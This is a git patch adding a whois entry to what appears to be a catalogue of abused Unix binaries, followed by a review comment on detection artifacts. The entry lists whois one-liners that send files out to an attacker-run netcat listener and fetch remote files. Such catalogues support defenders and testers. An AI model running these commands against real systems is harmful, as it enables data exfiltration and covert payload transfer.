From 54ff4f3d532027e23a49a65213602bd5f06b9d6e Mon Sep 17 00:00:00 2001
From: t0thkr1s
Date: Fri, 10 Jan 2020 13:18:28 +0100
Subject: [PATCH] add data for whois
---
data/whois.json | 25 +++++++++++++++++++++++++
1 file changed, 25 insertions(+)
create mode 100644 data/whois.json
diff --git a/data/whois.json b/data/whois.json
new file mode 100644
index 0000000..750c6a4
--- /dev/null
+++ b/data/whois.json
@@ -0,0 +1,25 @@
+{
+ "description": "'whois' hangs waiting for the remote peer to close the socket.",
+ "functions": {
+ "file-upload": [
+ {
+ "description": "Send a text file to a TCP port. Run 'nc -lp [port] > [file]' on the attacker box to collect the file. The file has a trailing '$'\\x0d\\x0a'' and its length is limited by the maximum size of arguments.",
+ "code": "whois -h [host] -p [port] \"`cat [file]`\"\n"
+ },
+ {
+ "description": "Send a binary file to a TCP port. Run 'nc -lp [port] | tr -d $'\\x0d' | base64 -d > [file]' on the attacker box to collect the file. The file length is limited by the maximum size of arguments.",
+ "code": "whois -h [host] -p [port] \"`base64 [file]`\"\n"
+ }
+ ],
+ "file-download": [
+ {
+ "description": "Fetch remote text file from a remote TCP port. Run 'nc -lp [port] < [file]' on the attacker box to send the file. The file has instances of '$'\\x0d'' stripped.",
+ "code": "whois -h [host] -p [port] > [file]\n"
+ },
+ {
+ "description": "Fetch remote binary file from a remote TCP port. Run 'base64 [file] | nc -lp [port]' on the attacker box to send the file.",
+ "code": "whois -h [host] -p [port] | base64 -d > [file]\n"
+ }
+ ]
+ }
+}
\ No newline at end of file
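Review bot: Both `file-upload` entries pass the file's contents as a `whois` command-line argument, but their descriptions mention only the argument-size limit. It is worth stating that the data therefore appears in process listings and command-line audit logs, which is the artifact a defender would look for alongside `whois` connecting to a port other than 43. Appending a sentence such as `The file contents are passed on the command line and are visible in process listings and command-line audit logs.` to each of the two descriptions would cover it. Separately, the file ends without a trailing newline (`\ No newline at end of file`) and every `code` value ends in an embedded `\n`, which a consumer presumably has to strip before display. Adding the final newline and dropping the embedded one would be cleaner, provided the loader does not depend on it.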